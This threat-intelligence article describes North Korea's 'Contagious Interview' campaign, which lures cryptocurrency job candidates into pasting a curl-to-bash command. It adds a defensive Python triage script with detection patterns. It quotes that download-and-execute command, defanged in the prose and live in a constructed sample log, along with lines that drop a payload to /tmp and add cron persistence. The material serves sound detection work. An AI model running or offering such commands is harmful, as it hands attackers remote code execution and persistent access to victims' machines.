Over the past year, security researchers have tracked a surge in activity from North Korean threat actors using elaborate social engineering to target professionals in the cryptocurrency industry.
This campaign, dubbed Contagious Interview, employs a deceptively benign job-application process that masks the delivery of sophisticated malware.
Victims receive invitations to participate in mock assessments for roles at fictitious firms, only to be lured into executing malicious scripts.
The attackers maintain a vast network of infrastructure, rapidly replacing compromised domains and servers to evade takedowns and sustain high levels of engagement.
Early in 2025, the adversaries began registering domains with names such as skillquestions[.]com and talentcheck[.]pro, setting up lure websites that prompt candidates to run shell commands under the guise of troubleshooting errors.
During the assessment an on-page error appears, typically a fake camera-access failure, and the page tells the candidate to paste a curl command into a terminal to "fix" it.
That single download-and-execute step is the entire initial-access phase: the fetched script installs malware that establishes persistent access and exfiltrates credentials.
The careful orchestration of these steps combined with tailored domain names has led to over 230 confirmed victim engagements within a three-month period.
SentinelLABS analysts noted that the operators continuously monitor threat intelligence platforms such as Validin and VirusTotal.
By registering community accounts shortly after new Indicators of Compromise (IOCs) are published, for example in Maltrail's apt_lazarus[.]txt list, they learn quickly which parts of their own infrastructure have been exposed.
Rather than hardening or modifying the exposed assets, they simply stand up entirely new servers whenever a domain is disrupted.
The choice favors operational agility over resilience and keeps the actors a step ahead of takedown requests.
SentinelLABS researchers identified that the infrastructure replacement cycle is measured in hours rather than weeks.
When a service provider disables a domain, the threat actors immediately provision a fresh domain, migrate their malware distribution servers, and update command-and-control endpoints.
[Figure: "… tracked as maintainer of cors-app and cors-parser" (Source: SentinelOne)]
Behind the scenes, coordination occurs through team collaboration platforms like Slack, where automated bots post summaries of new domains, and individual operators click through these previews in rapid succession.
Infection Mechanism
At the heart of the Contagious Interview campaign lies a minimalist yet effective infection mechanism.
Upon visiting the lure site, targets encounter a JavaScript-powered form that simulates a live coding assessment.
When they trigger the fabricated error, the page displays a terminal command to paste:
curl -s https[:]//api[.]drive-release[.]cloud/update[.]sh | bash
Executing this command pipes a remote shell script straight into bash; the script performs environment checks, detects the victim's operating system, and downloads a payload tailored to it.
It then installs a lightweight backdoor, writes a cron entry for persistence, and registers the compromised host with the actor-controlled C2 server over HTTPS.
All stages are logged by the ContagiousDrop Node[.]js application on the server, creating detailed victimology records in JSON files such as client_ips_start_test[.]json.
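Because the domains in this campaign are rotated within hours, blocking the IOC in the command above buys little; the durable signal is the behaviour: a curl or wget fetch piped into a shell, followed by a dropped file and a cron entry spawned from that same process. The following is an added triage script, not code from the SentinelLABS report or from the campaign's own tooling. It assumes a simplified JSON-lines process log with the fields ts, user, pid, ppid and cmdline; the sample lines are constructed, with the domain taken from the lure command quoted above and the dropped-file path, payload URL and cron schedule invented for illustration.

```python
"""Triage process telemetry for a pasted "curl ... | bash" lure and what it spawned.

Added example, not code from the SentinelLABS report or from the campaign.
Assumes a simplified JSON-lines process log (fields: ts, user, pid, ppid,
cmdline). SAMPLE_LOG is constructed: the domain comes from the lure command
in the article; /tmp/.update/agent, agent-linux and the cron line are invented.
"""
import json
import re

# Stage 1: a remote script fetched with curl/wget and piped straight into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.IGNORECASE)
# Stage 2: the fetched script writing a file to a hidden or world-writable path.
DROP_TO_TMP = re.compile(r"\s-[oO]\s+(/tmp|/var/tmp|/dev/shm|\S*/\.)\S*")
# Stage 3: persistence through cron, as the article describes for update.sh.
CRON_PERSIST = re.compile(r"\bcrontab\b|/etc/cron\.d/|/var/spool/cron/")

SAMPLE_LOG = r"""
{"ts": "2025-04-02T14:01:07Z", "user": "dev", "pid": 3990, "ppid": 1200, "cmdline": "zsh"}
{"ts": "2025-04-02T14:03:41Z", "user": "dev", "pid": 4102, "ppid": 3990, "cmdline": "curl -s https://api.drive-release.cloud/update.sh | bash"}
{"ts": "2025-04-02T14:03:42Z", "user": "dev", "pid": 4110, "ppid": 4102, "cmdline": "uname -sm"}
{"ts": "2025-04-02T14:03:43Z", "user": "dev", "pid": 4115, "ppid": 4102, "cmdline": "curl -s -o /tmp/.update/agent https://api.drive-release.cloud/agent-linux"}
{"ts": "2025-04-02T14:03:44Z", "user": "dev", "pid": 4118, "ppid": 4102, "cmdline": "bash -c '(crontab -l; echo \"*/5 * * * * /tmp/.update/agent\") | crontab -'"}
{"ts": "2025-04-02T14:03:44Z", "user": "dev", "pid": 4120, "ppid": 4118, "cmdline": "crontab -"}
{"ts": "2025-04-02T14:10:02Z", "user": "dev", "pid": 4200, "ppid": 3990, "cmdline": "curl -s -o /dev/null https://pypi.org/simple/"}
{"ts": "2025-04-02T14:11:30Z", "user": "dev", "pid": 4201, "ppid": 3990, "cmdline": "crontab -l"}
"""


def parse_log(text):
    """Parse JSON-lines telemetry into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_pipe_to_shell(events):
    """Return the events whose command line pipes a remote download into a shell."""
    return [e for e in events if PIPE_TO_SHELL.search(e["cmdline"])]


def descendants(events, root_pid):
    """Return events whose parent chain leads back to root_pid (any depth)."""
    by_pid = {e["pid"]: e for e in events}
    found = []
    for e in events:
        pid, seen = e["ppid"], set()
        while pid not in seen:          # guard against cyclic/garbled ppid data
            if pid == root_pid:
                found.append(e)
                break
            seen.add(pid)
            parent = by_pid.get(pid)
            if parent is None:          # ancestry leaves the log; stop walking
                break
            pid = parent["ppid"]
    return found


def triage(events):
    """One alert per pipe-to-shell root, enriched with what that process spawned.

    Severity is raised to high only when a descendant touched cron, so a lone
    curl|bash (e.g. a developer installing a tool) stays at medium for review.
    """
    alerts = []
    for root in find_pipe_to_shell(events):
        children = descendants(events, root["pid"])
        persistence = [c["cmdline"] for c in children if CRON_PERSIST.search(c["cmdline"])]
        dropped = [c["cmdline"] for c in children if DROP_TO_TMP.search(c["cmdline"])]
        alerts.append({
            "ts": root["ts"],
            "user": root["user"],
            "pid": root["pid"],
            "lure": root["cmdline"],
            "spawned": len(children),
            "dropped": dropped,
            "persistence": persistence,
            "severity": "high" if persistence else "medium",
        })
    return alerts


if __name__ == "__main__":
    print(json.dumps(triage(parse_log(SAMPLE_LOG)), indent=2))
```

On the constructed log the script raises a single high-severity alert rooted at the pasted curl command, attributing the uname check, the drop to /tmp/.update/agent and both crontab invocations to it, while the unrelated curl to PyPI and the interactive crontab -l are left alone because they neither match the pipe pattern nor descend from the flagged process. Real EDR sources usually record the pasted line as separate curl and bash processes with a shared parent, so in production the Stage 1 match should also be run over sibling processes of the same terminal session.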
This blend of social engineering and automated scripting maximizes infection rates while minimizing developer effort, reflecting a maturation of DPRK offensive capabilities.
Through these adaptive tactics—rapid infrastructure turnover, intelligence-driven asset scouting, and streamlined payload delivery—North Korean threat actors continue to pose a dynamic and persistent threat.
As defenders strengthen their detection, understanding this infection mechanism remains crucial: the chain is most reliably broken at the moment the pasted command executes, before the backdoor and its cron persistence are in place.